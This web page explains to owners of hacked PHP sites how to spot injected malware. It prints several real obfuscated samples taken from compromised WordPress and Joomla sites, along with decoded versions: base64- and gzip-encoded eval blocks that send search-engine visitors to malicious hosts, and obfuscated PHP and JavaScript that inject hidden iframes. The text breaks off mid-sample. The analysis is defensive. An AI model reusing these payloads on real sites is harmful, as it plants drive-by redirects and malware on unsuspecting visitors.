Redleg Home

"Aw Snap" My website has been hacked! Now what? A few tips from redleg.

Examples of malicious php code

PHP is a powerful scripting language and it's built in base64 encode/decode capabilites allow hackers to obfuscate their malicious code, which is quite effective at "hiding" what the function of the code is. In php sites suchs as WordPress, Joomla, Drupal (and many other CMS) base​64 encoding is a common technique employed by hackers.

This simple line of code

$tmp=base​64_encode('I am a really malicious line of code!');

will base64 encode the string "I am a really malicious line of code!". The line echo($tmp); will list out the encoded string "SSBhbSBhIHJlYWx​seSBtYWxpY2lvdXM​gbGluZSBvZiBjb2RlIQ==" to the browser. Then add the base​64_de​code function to a sites pages.

ev​al(base​64_de​code('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');

When the page is requested the php code will execute on the server and the malicious line will be added to the content that is sent to the user. While a site owner would instantly be suspect of

I am a really malicious line of code!

the function of the line of base64 encoded code is not as clear. While ev​al(base​64_de​code('..[seemingly random string]...'); is the most common hackers also use other php encode functions such as

ev​al(gzinflate(base​64_de​code('...');

ev​al(gzuncompress(base​64_de​code('...);

ev​al(gzinflate(str_rot13(base​64_de​code('...');

PHP code executes on your server and the results of that execution is inserted into the code that is sent to the users browser. If you open a page in a browser and view the source for the page you will not see the PHP code you will see what ever output is being generated by the script. To find and remove the actual PHP code you will need to edit the files on your server. I have a tool on line at Redleg's PHP base64 Decoder which will de​code most base​64 encoded stuff.

The following base64 encoded php was found in the homepage, index.php, of a Joomla site but this type of code can be found on any site running php.

ev​al(base​64_de​code("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0h UVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJ pc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGV hZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5 wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));

Which decodes to the following script --

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie"))
{
if (!$trum)
{
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: hxxp://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
echo "< if​rame frameborder="0" height="1" scrolling="no" src="hxxp:// rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></ifr​ame>";
}
}

Now lets take a closer look at the code

error_reporting(0); --> Turns off php error reporting

Note: Anytime you see a php script start with

error_reporting(0); or error_reporting(E_ERROR | E_WARNING | E_PARSE); or ini_set('display_errors', "0");

you should be suspicious. These lines of code are used by hackers to turn off php's error reporting.

$trum=headers_sent(); --> sets the variable to true if headers have been sent to requester.

$referer=​$_SERVER['HTTP_REFERER']; --> sets the variable to the referring page.

$ua=​$_SERVER['HTTP_USER_AGENT']; --> sets the variable to the user agent in the request.

if (stristr($ua,"msie")) --> if the string 'msie' is in the user agent continue, msie is in the user agent for Internet Explorer

if (!$trum) --> headers have not been sent continue

if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) --> If the string yahoo, google or bing is in the URL of the referring page, a search results page.

if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")) --> The conditional checks if the search operators site:, cache:, or inurl: is in the referring page and if it is the redirect will NOT (!) occur.

header("Location: hxxp://alapotremnba.osa.pl/rif/"); -> this line of code redirects the request to a the malicious location.

exit();

else -> This else goes with the headers sent line, if headers have been sent then trying to redirect would create a php error so instead of redirecting add a malicious hidden iframe to the page.

echo "< if rame frameborder="0" height="1" scrolling="no" src="hxxp:// rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></if rame>"; -> writes the malicious iframe.

The following code examples are common redirects.

base​64_de​code(​\"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTs NCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmV mZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImF wb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYm xldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbH JcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYW NlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW 9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==\")

Which writes a conditional redirect

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: hxxp:// www6 . uiopqw . jkub . com/"); exit(); }}} } }


ev​al(base​64_de​code(​"aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVG RVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlh aG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQll eGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZF UltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQlwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7 DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtl eXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9"));


if (stristr($_SERVER[http_REFERER],"bing"))
{
preg_match ("/q\=(.*?)&/",$_SERVER[http_REFERER],$kk);
header("Location: hxxp:// proppera . co . cc /?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"yahoo"))
{
preg_match ("/p\=(.*?)&/",$_SERVER[http_REFERER],$kk);
header("Location: hxxp:// proppera . co . cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"google"))
{
if (!stristr($_SERVER[http_REFERER],".nu")
and !stristr($_SERVER[http_REFERER],"site")
and !stristr($_SERVER[http_REFERER],"inurl"))
{
preg_match ("/q\=(.*)/",$_SERVER[http_REFERER],$kk);
if (stristr($kk[1],"&"))
{
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urlde​code($key2[1]);
}
else
{
$keyword=urlde​code($kk[1]);
}
header("Location: hxxp:// proppera . co . cc /?q=".$keyword);
exit();
}
}


ev​al(base​64_de​code(​"ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVIn XTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikp IHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDov L2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));


error_reporting(0);
$nccv=headers_sent();
if (!$nccv)
{
$referer=$_SERVER['http_REFERER'];
$ua=$_SERVER['http_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: hxxp:// buyordie . osa . pl/");
exit();
} } }

The following block of code is being found on a lot of WordPress sites. In most cases it has been redirecting search results to uniqtext.com/search.php?theme=[*search query used*]

$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].
$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].
$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].
$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].
$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].
$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].
$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].
$wp_salt[12]);
$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKV jQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh...... [snipped a bit] .......7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984Z KT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');

On many sites hackers will use some obfuscated php code

ev​al(gzinflate(base​64_de​code('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhppMgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL8Tlatq0xfdae m5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTeVs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTqFmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOP jGBI+xI3JGsY1kXMyVgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENiFk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG1UEl+1R5R7MzoZJYRwBPwAXtS xETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9ocS61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2iLLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76f jCrZqqW GiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH0T3h0sw df002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4IN RPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98 vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16 SgFzUN/e3yvAF3zbXS gveO7dbv/AcJ1j7+fWVeQP+DQ==');

to write some obfuscated JavaScript

<scr​ip​t>d=Date;d=new d();h=-parse​Int('012')/5;if(window.do​cument)try{new'qwe'.prototype} ca​tch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~ 50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~ 38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5 ~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~ 3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~ 48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56 ~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~ 53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~ 48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55 ~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~ 51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~ 18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~ 57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~ 54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~ 57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16 ~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~ 54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~ 47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~ 56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~ 47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~ 48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~ 22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~ 22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~ 51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~ 50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~ 59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~ 49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~ 53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~ 29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~ 18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~ 19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~ 56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~ 50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~ 48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~ 56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~ 19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~ 28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));for(i=0;i!=611;i++){j=i; ss=ss+St​ring[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(''+q);

to add a malicious iframe to the pages on the site.

if (document.getElementsByTagName('body')[0])
{
iframer();
}
else
{
document.write("<iframe src='hxxp://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
} function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'hxxp:// motivemus . mooo . com /showthread.php?t=45122773');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}

This is another example of obfuscated script used to insert an iframe but the php is "double" encoded. This is the code you would find in your homepage or one of your common files

ev​al(gzinflate(base​64_de​code('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');

When we plug that long string of characters into the de​coder we get

if (!isset($frmDs)){ global $frmDs; $frmDs = 1; $ua = $_SERVER['HTTP_USER_AGENT']; if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){ error_reporting(0); if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1; if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/'); if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print(''); } }

While it is starting to be a little more readable we still have another long base​64 encoded string, plug that into the de​coder and we can now see the JavaScript that is appearing in the pages of the site.

t​ry{do​cument.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.do​cument)t​ry{do​cument.body=12;}ca​tch(gdsgsdg){ asd=0;t​ry{q=do​cument.cr​eate​Element("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1) {f=ne​w Ar​ray(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96, 114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32, 76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107, 97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29, 117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,105,101,38,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109, 98,108,119,114,37,38,33,60,43,46,32,37,36,29,117,96,44,102,110,99,99,117,79,101,38,36,77,82,71,66,39,40,31,58,45,48,39,120,13,9,7,6,100,110,97,114,109,100,108,113, 46,118,112,102,116,100,38,36,60,114,114,118,108,100,60,43,115,38,41,112,116,109,107,40,39,31,121,29,112,110,113,102,116,104,109,107,58,96,96,112,111,107,115,113,101, 58,30,105,101,101,114,55,45,38,41,100,114,96,38,51,48,47,42,46,48,47,46,38,43,38,110,117,59,31,114,108,112,57,43,36,43,102,112,94,40,53,46,45,44,48,46,45,48,40,41,36, 112,119,57,29,125,59,45,112,116,120,106,98,62,31,58,97,105,117,30,96,108,96,113,112,61,33,113,36,43,114,114,107,109,42,37,31,62,59,103,99,114,96,107,98,32,114,112,96, 61,33,102,113,116,111,56,44,47,107,99,98,110,103,104,117,115,120,44,106,121,101,117,43,117,114,45,94,100,46,100,98,101,99,44,109,104,111,32,29,119,104,98,113,104,60, 32,36,43,102,112,94,40,50,46,45,44,53,46,45,41,42,37,31,32,103,99,102,103,103,114,58,34,38,41,100,114,96,38,48,48,47,42,51,48,47,39,40,39,33,60,57,47,104,100,111,97, 108,99,59,60,46,98,102,118,61,37,38,59,12,8,6,125,12,8,6,118,96,112,29,101,119,110,58,110,100,117,29,68,96,114,98,40,40,57,98,120,111,44,112,101,115,66,94,116,100,38, 98,120,111,44,100,101,115,66,94,116,100,38,38,43,54,39,56,13,9,7,102,102,39,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,45,103,107,100,100,118,76,102,39, 